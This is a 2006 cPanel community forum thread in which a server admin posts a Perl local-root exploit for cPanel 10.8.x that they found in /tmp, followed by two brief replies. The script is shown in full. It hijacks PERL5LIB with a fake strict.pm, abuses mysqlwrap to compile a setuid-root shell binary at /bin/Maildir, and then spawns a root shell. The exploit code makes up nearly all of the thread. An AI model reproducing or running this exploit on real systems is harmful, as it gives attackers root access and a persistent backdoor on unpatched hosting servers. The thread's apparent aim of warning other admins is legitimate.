The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

cpwrap root exploit

Discussion in 'General Discussion' started by otsh, Oct 11, 2006.

  1. otsh

    otsh Member

    Joined:
    Sep 9, 2006
    Messages:
    7
    Likes Received:
    0
    Trophy Points:
    1
    found this today on my box in /tmp


    #!/usr/bin/perl -w

    # 10/01/06 - cPanel <= 10.8.x cpwrap root exploit via mysqladmin
    # use strict; # haha oh wait..

    my $cpwrap = "/usr/local/cpanel/bin/cpwrap";
    my $mysqlwrap = "/usr/local/cpanel/bin/mysqlwrap";
    my $pwd = `pwd`;

    chomp $pwd;
    $ENV{'PERL5LIB'} = "$pwd";

    #if ( ! -x "/usr/bin/gcc" ) { die "gcc: $!\n"; }
    if ( ! -x "$cpwrap" ) { die "$cpwrap: $!\n"; }
    if ( ! -x "$mysqlwrap" ) { die "$mysqlwrap: $!\n"; }

    open (CPWRAP, "<$cpwrap") or die "Could not open $cpwrap: $!\n";
    while(<CPWRAP>) {
    if(/REMOTE_USER/) { print "$cpwrap is patched.\n"; }
    }
    close (CPWRAP);

    open (STRICT, ">strict.pm") or die "Can't open strict.pm: $!\n";
    print STRICT "\$e = \"int main(){setreuid(0,0);setregid(0,0);system(\\\\\\\"/bin/bash\\\\\\\");}\";\n";
    print STRICT "system(\"/bin/echo -n \\\"\$e\\\">Maildir.c\");\n";
    print STRICT "system(\"/usr/bin/gcc Maildir.c -o /bin/Maildir\");\n";
    print STRICT "system(\"/bin/chmod 4755 /bin/Maildir\");\n";
    print STRICT "system(\"/bin/rm -f Maildir.c strict.pm\");\n";
    #print STRICT "system(\"chmod 4755 /tmp/lsh; chmod root:root /tmp/lsh; mv /tmp/lsh /bin/lsh\");\n";
    close (STRICT);

    system("$mysqlwrap DUMPMYSQL 2>/dev/null");

    if ( -e "/bin/Maildir" ) {
    system("/bin/lsh");
    }
    else {
    unlink "strict.pm";
    die "Failed\n";
    }
     
  2. securitydot

    securitydot Registered

    Joined:
    Mar 29, 2006
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    1
    #2 securitydot, Oct 11, 2006
    Last edited: Oct 11, 2006
  3. otsh

    otsh Member

    Joined:
    Sep 9, 2006
    Messages:
    7
    Likes Received:
    0
    Trophy Points:
    1
    Thankfully I was patched. Thanks for the heads up.
     
Loading...

Share This Page